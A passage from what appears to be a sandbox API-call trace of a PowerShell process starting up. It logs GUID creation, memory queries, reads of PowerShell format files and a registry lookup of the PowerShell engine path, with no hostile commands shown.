[4]=0xe6, [5]=0xb9, [6]=0x4f, [7]=0x91))) returned 0x0 [0054.342] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x7038206d, Data2=0x9e01, Data3=0x42cb, Data4=([0]=0x9d, [1]=0x49, [2]=0xd0, [3]=0xff, [4]=0xb9, [5]=0x4b, [6]=0x54, [7]=0x90))) returned 0x0 [0054.343] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x3f80ce52, Data2=0x49b7, Data3=0x476f, Data4=([0]=0xaa, [1]=0xaf, [2]=0xf8, [3]=0x88, [4]=0x9d, [5]=0x1f, [6]=0xe7, [7]=0xda))) returned 0x0 [0054.343] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xb610d9e4, Data2=0x2f26, Data3=0x41ff, Data4=([0]=0xb2, [1]=0xf1, [2]=0xb5, [3]=0xb8, [4]=0xcf, [5]=0xba, [6]=0xc7, [7]=0xe6))) returned 0x0 [0054.343] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x711bf96a, Data2=0x684b, Data3=0x4dbb, Data4=([0]=0x82, [1]=0xc, [2]=0xf8, [3]=0x34, [4]=0xd7, [5]=0x23, [6]=0x52, [7]=0xd6))) returned 0x0 [0054.343] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x41fa5d9, Data2=0xe43, Data3=0x484a, Data4=([0]=0xb3, [1]=0xd3, [2]=0x7b, [3]=0xa, [4]=0xb5, [5]=0x9a, [6]=0x36, [7]=0xbb))) returned 0x0 [0054.343] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x28b132f1, Data2=0x5d8d, Data3=0x4037, Data4=([0]=0xa0, [1]=0xcf, [2]=0x7d, [3]=0xc8, [4]=0xa7, [5]=0xd5, [6]=0x8e, [7]=0x9c))) returned 0x0 [0054.343] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x530e8ea0, Data2=0x8989, Data3=0x44ee, Data4=([0]=0x97, [1]=0xc8, [2]=0x44, [3]=0x89, [4]=0x56, [5]=0xe1, [6]=0x7d, [7]=0x25))) returned 0x0 [0054.343] VirtualQuery (in: lpAddress=0x2cd680, lpBuffer=0x2ce680, dwLength=0x1c | out: lpBuffer=0x2ce680*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.344] VirtualQuery (in: lpAddress=0x2cd680, lpBuffer=0x2ce680, dwLength=0x1c | out: lpBuffer=0x2ce680*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.345] VirtualQuery (in: lpAddress=0x2cd680, lpBuffer=0x2ce680, dwLength=0x1c | out: lpBuffer=0x2ce680*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.347] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x93a3c05e, Data2=0xbc9c, Data3=0x4191, Data4=([0]=0xb0, [1]=0x92, [2]=0xed, [3]=0x67, [4]=0x24, [5]=0xed, [6]=0xc1, [7]=0x65))) returned 0x0 [0054.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce3ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0054.347] GetLastError () returned 0x0 [0054.348] SetErrorMode (uMode=0x1) returned 0x1 [0054.348] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0054.348] GetLastError () returned 0x0 [0054.348] GetFileType (hFile=0x31c) returned 0x1 [0054.348] SetErrorMode (uMode=0x1) returned 0x1 [0054.348] GetFileType (hFile=0x31c) returned 0x1 [0054.348] ReadFile (in: hFile=0x31c, lpBuffer=0x2f56bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2f56bc8*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.357] GetLastError () returned 0x0 [0054.357] ReadFile (in: hFile=0x31c, lpBuffer=0x2f56bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2f56bc8*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.358] GetLastError () returned 0x0 [0054.358] ReadFile (in: hFile=0x31c, lpBuffer=0x2f56bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2f56bc8*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.358] GetLastError () returned 0x0 [0054.358] ReadFile (in: hFile=0x31c, lpBuffer=0x2f56bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2f56bc8*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.358] GetLastError () returned 0x0 [0054.359] ReadFile (in: hFile=0x31c, lpBuffer=0x2f56bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2f56bc8*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.359] GetLastError () returned 0x0 [0054.359] ReadFile (in: hFile=0x31c, lpBuffer=0x2f56bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2f56bc8*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.359] GetLastError () returned 0x0 [0054.359] ReadFile (in: hFile=0x31c, lpBuffer=0x2f56bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2f56bc8*, lpNumberOfBytesRead=0x2ce954*=0x119, lpOverlapped=0x0) returned 1 [0054.359] GetLastError () returned 0x0 [0054.360] ReadFile (in: hFile=0x31c, lpBuffer=0x2f56bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2f56bc8*, lpNumberOfBytesRead=0x2ce954*=0x0, lpOverlapped=0x0) returned 1 [0054.360] GetLastError () returned 0x0 [0054.360] CloseHandle (hObject=0x31c) returned 1 [0054.360] GetLastError () returned 0x0 [0054.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce4b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0054.360] GetLastError () returned 0x0 [0054.360] SetErrorMode (uMode=0x1) returned 0x1 [0054.360] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2f77bc4 | out: lpFileInformation=0x2f77bc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0054.360] GetLastError () returned 0x0 [0054.360] SetErrorMode (uMode=0x1) returned 0x1 [0054.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0054.360] GetLastError () returned 0x0 [0054.360] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce8d8 | out: phkResult=0x2ce8d8*=0x31c) returned 0x0 [0054.360] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2ce920, lpData=0x0, lpcbData=0x2ce91c*=0x0 | out: lpType=0x2ce920*=0x1, lpData=0x0, lpcbData=0x2ce91c*=0x56) returned 0x0 [0054.361] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2ce920, lpData=0x3b8428, lpcbData=0x2ce91c*=0x56 | out: lpType=0x2ce920*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2ce91c*=0x56) returned 0x0 [0054.361] RegCloseKey (hKey=0x31c) returned 0x0 [0054.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0054.361] GetLastError () returned 0x0 [0054.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce414, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0054.361] GetLastError () returned 0x0 [0054.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.362] GetLastError () returned 0x0 [0054.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.362] GetLastError () returned 0x0 [0054.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.362] GetLastError () returned 0x0 [0054.362] VirtualQuery (in: lpAddress=0x2cd630, lpBuffer=0x2ce630, dwLength=0x1c | out: lpBuffer=0x2ce630*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.362] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x24d12aa1, Data2=0x4765, Data3=0x4d47, Data4=([0]=0xb0, [1]=0x8c, [2]=0x0, [3]=0xa7, [4]=0x55, [5]=0x40, [6]=0x63, [7]=0x3a))) returned 0x0 [0054.363] VirtualQuery (in: lpAddress=0x2cd680, lpBuffer=0x2ce680, dwLength=0x1c | out: lpBuffer=0x2ce680*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.363] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x716e3c85, Data2=0x5fad, Data3=0x472f, Data4=([0]=0x9b, [1]=0x14, [2]=0xd6, [3]=0xb7, [4]=0xa7, [5]=0xb5, [6]=0xf4, [7]=0x9b))) returned 0x0 [0054.363] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x2c31cd99, Data2=0x5b12, Data3=0x43ce, Data4=([0]=0xb8, [1]=0xe7, [2]=0x17, [3]=0x35, [4]=0x81, [5]=0xf9, [6]=0x6d, [7]=0x33))) returned 0x0 [0054.363] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x9521f05c, Data2=0xec25, Data3=0x4ad7, Data4=([0]=0xa9, [1]=0x94, [2]=0x8d, [3]=0x1f, [4]=0xde, [5]=0x4e, [6]=0x9f, [7]=0x41))) returned 0x0 [0054.363] VirtualQuery (in: lpAddress=0x2cd680, lpBuffer=0x2ce680, dwLength=0x1c | out: lpBuffer=0x2ce680*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.364] VirtualQuery (in: lpAddress=0x2cd680, lpBuffer=0x2ce680, dwLength=0x1c | out: lpBuffer=0x2ce680*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce3ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0054.364] GetLastError () returned 0x0 [0054.364] SetErrorMode (uMode=0x1) returned 0x1 [0054.364] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0054.364] GetLastError () returned 0x0 [0054.364] GetFileType (hFile=0x31c) returned 0x1 [0054.364] SetErrorMode (uMode=0x1) returned 0x1 [0054.364] GetFileType (hFile=0x31c) returned 0x1 [0054.364] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.366] GetLastError () returned 0x0 [0054.367] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.368] GetLastError () returned 0x0 [0054.368] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.368] GetLastError () returned 0x0 [0054.368] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.368] GetLastError () returned 0x0 [0054.369] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.369] GetLastError () returned 0x0 [0054.369] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.369] GetLastError () returned 0x0 [0054.369] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.369] GetLastError () returned 0x0 [0054.369] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.369] GetLastError () returned 0x0 [0054.370] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.370] GetLastError () returned 0x0 [0054.370] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.370] GetLastError () returned 0x0 [0054.371] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.371] GetLastError () returned 0x0 [0054.371] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.371] GetLastError () returned 0x0 [0054.371] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.371] GetLastError () returned 0x0 [0054.371] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.371] GetLastError () returned 0x0 [0054.371] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.372] GetLastError () returned 0x0 [0054.372] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.372] GetLastError () returned 0x0 [0054.374] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.375] GetLastError () returned 0x0 [0054.375] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.375] GetLastError () returned 0x0 [0054.375] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.375] GetLastError () returned 0x0 [0054.375] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.375] GetLastError () returned 0x0 [0054.375] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.375] GetLastError () returned 0x0 [0054.375] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.376] GetLastError () returned 0x0 [0054.376] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.376] GetLastError () returned 0x0 [0054.376] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.376] GetLastError () returned 0x0 [0054.376] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.376] GetLastError () returned 0x0 [0054.376] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.376] GetLastError () returned 0x0 [0054.376] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.377] GetLastError () returned 0x0 [0054.377] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.377] GetLastError () returned 0x0 [0054.377] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.377] GetLastError () returned 0x0 [0054.377] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.377] GetLastError () returned 0x0 [0054.377] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.377] GetLastError () returned 0x0 [0054.377] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.377] GetLastError () returned 0x0 [0054.381] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.382] GetLastError () returned 0x0 [0054.382] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.382] GetLastError () returned 0x0 [0054.382] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.382] GetLastError () returned 0x0 [0054.382] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.382] GetLastError () returned 0x0 [0054.382] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.382] GetLastError () returned 0x0 [0054.382] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.383] GetLastError () returned 0x0 [0054.383] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.383] GetLastError () returned 0x0 [0054.383] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.383] GetLastError () returned 0x0 [0054.383] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2fa0bec*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.383] GetLastError () returned 0x0 [0054.383] ReadFile (in: hFile=0x31c, lpBuffer=0x2fa0bec, nNumberOfBytesToRead=0x1000, 